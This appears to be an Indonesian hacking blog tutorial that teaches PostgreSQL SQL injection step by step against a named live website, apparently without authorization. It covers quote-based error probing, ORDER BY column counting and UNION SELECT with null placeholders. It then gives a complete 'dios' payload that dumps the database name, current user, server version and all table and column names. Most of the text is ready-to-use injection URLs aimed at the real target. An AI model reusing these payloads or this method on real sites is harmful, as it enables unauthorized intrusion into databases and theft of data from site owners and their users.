Assalamualaikum warahmatullahi wabarakatuh, alhamdulillah Kembali lagi bersama saya kali ini saya akan mengajarkan bagaimana caranya melakukan SQL injection tipe postgre.
Dari tutorial yang saya buat sebelumnya mulai dari SQL untuk pemula dan mssql linknya akan saya Letakkan di sini ::
https://clan-x12.blogspot.com/2022/10/tutorial-sqlinjection-bagi-pemula.html
https://clan-x12.blogspot.com/2022/10/tutorial-mssql-injection.html
Kalian pasti sudah paham cara melakukan injeksi terhadap website, nah kali ini saya akan mengajarkan kalian semua sama seperti apa yang di judul materi kali ini jadi langsung aja tanpa basa-basi saya akan menggunakan live target di bawah ini.
Live Target :: http://www.tyubusuiki.com/webpage.php?gid=14
Nah udah targetnya sudah saya siapkan, langsung saja kita ke tutorialnya.
Sebelum itu saya ingin menjelaskan SQLi tipe postgre ini juga berbeda seperti tipe sebelumnya, Nanti kalian akan tahu perbedaannya di mana sekaligus akan saya Terangkan sedetail dan sedemikian rupa Agar kalian paham. Untuk diosnya juga berbeda jadi setiap tipe SQL itu memiliki ciri khas yang berbeda.
Lihatlah tampilan website di bawah ini kita perhatikan normalnya Seperti apa dan kita perhatikan juga errornya seperti apa.
http://www.tyubusuiki.com/webpage.php?gid=14
Untuk tampilannya masih normal-normal saja karena belum kita berikan yang namanya single quote, nah coba kita berikan single quote dan perhatikan tampilan di bawah ini.
http://www.tyubusuiki.com/webpage.php?gid=14'
Nah tampilan di atas sudah cukup jelas bahwa websitenya itu error karena telah kita berikan yang namanya (single quote).
Lalu kita coba normalkan saja dengan memberikan url balancer tapi ketika websitenya tidak normal atau tidak kembali seperti semula bisa dipastikan atau bisa diartikan websitenya tidak support single quote, perhatikan tampilan di bawah ini Ketika saya memberikan url balancer.
http://www.tyubusuiki.com/webpage.php?gid=14'--+-
Nah tampilan di atas itu merupakan tampilan yang tetap error berarti sudah jelas websitenya tidak support single quote Mari kita hapus single quote.
Mari kita normalkan websitenya dengan menghapus single quote-nya dan menyisakan URL balancernya, perhatikan tampilan website di bawah ini.
http://www.tyubusuiki.com/webpage.php?gid=14--+-
Nah ketika websitenya telah normal Mari kita berikan yang namanya order by untuk menghitung angka kolomnya, perhatikan tampilan di bawah ini Ketika saya menghitung angka kolom.
http://www.tyubusuiki.com/webpage.php?gid=14 ORDER BY 12--+-
Ketika saya menghitung angka kolom, errornya itu berada pada angka 12 Coba saja kita kurangi angka yang menjadi angka 11.
http://www.tyubusuiki.com/webpage.php?gid=14 ORDER BY 11--+-
Nah saya menemukan normal dari kolomnya itu berada pada angka 11 Jadi langsung saja kita menggunakan Union select untuk memunculkan angka celahnya.
Perhatikan tampilan di bawah ini Ketika saya memberikan Union select pada websitenya.
http://www.tyubusuiki.com/webpage.php?gid=14 AND 1=0 UNION SELECT null,null,null,null,null,null,null,null,null,null,null--+-
Jangan lupa tambahkan 1=0 pada union selectnya, karena type postgre dan oracle membutuhkan itu untuk menormalkan websitenya walau terlihat error.
Mungkin kalian bertanya-tanya apa sih 1=0 itu?
Anggap saja itu adalah true/false jadi memang sangat dibutuhkan untuk tipe dari kedua itu, yaitu postgre dan oracle.
Dan Mungkin ada beberapa pertanyaan dari kalian kenapa saya menggunakan null pada Union select kali ini, Iya karena memang beberapa tipe dari cara kerja SQL injection ini memiliki tipe yang berbeda, jadi untuk postgre - oracle keseringan itu menggunakan null pada onion select nya.
Ketika kita menggunakan null Maka angkat saya tidak akan muncul terkecuali kita meng-print satu persatu dari null itu. Mari kita coba untuk memprint satu persatu dari null tersebut.
Mungkin saya ibaratkan dengan mati lampu pada malam hari kita berusaha mencari lilin di tempat yang gelap dan kita berusaha menerangi kegelapan itu menggunakan lilin tersebut jika tidak paham perhatikan saja dan pahami saja sebisa mungkin untuk pencarian angka celah ini.
Kalian bisa menggunakan ' atau menggunakan $$ untuk memprint null tersebut.
http://www.tyubusuiki.com/webpage.php?gid=14 AND 1=0 UNION SELECT null,null,null,null,null,null,null,null,null,null,'null'--+-
Saya di sini menemukan angka ke-11, Jadi langsung saja kita mengeksekusi web ini menggunakan dios tipe postgre.
Langsung saja kita Letakkan diosnya
$$numb_X12<br>$$||$$<br>$$||current_database()||$$<br>$$||current_user||$$<br>$$||version()||$$<br>$$||(SELECT ARRAY_TO_STRING(array(SELECT($$<li>$$||table_name||$$ :: $$||column_name)::TEXT FROM information_schema.columns WHERE table_schema=$$public$$),$$<br>$$))
Dan perhatikan tampilan website di bawah ini Ketika saya memberikan diosnya
http://www.tyubusuiki.com/webpage.php?gid=14 AND 1=0 UNION SELECT null,null,null,null,null,null,null,null,null,null,$$numb_X12<br>$$||$$<br>$$||current_database()||$$<br>$$||current_user||$$<br>$$||version()||$$<br>$$||(SELECT ARRAY_TO_STRING(array(SELECT($$<li>$$||table_name||$$ :: $$||column_name)::TEXT FROM information_schema.columns WHERE table_schema=$$public$$),$$<br>$$))--+-
Sekiranya tidak paham Coba saja kalian ulang-ulang sampai kalian paham atau kalian bisa mencari tutorial melalui video YouTube
Mungkin sampai sinilah yang dapat saya sampaikan kurang lebih saya mohon maaf ketika ada kesalahan kata juga minta maaf kepada Allah saya mohon ampun saya akhiri dengan mengucapkan terima kasih karena telah belajar menggunakan artikel ini.
Saya ./numb_X12
Terimakasih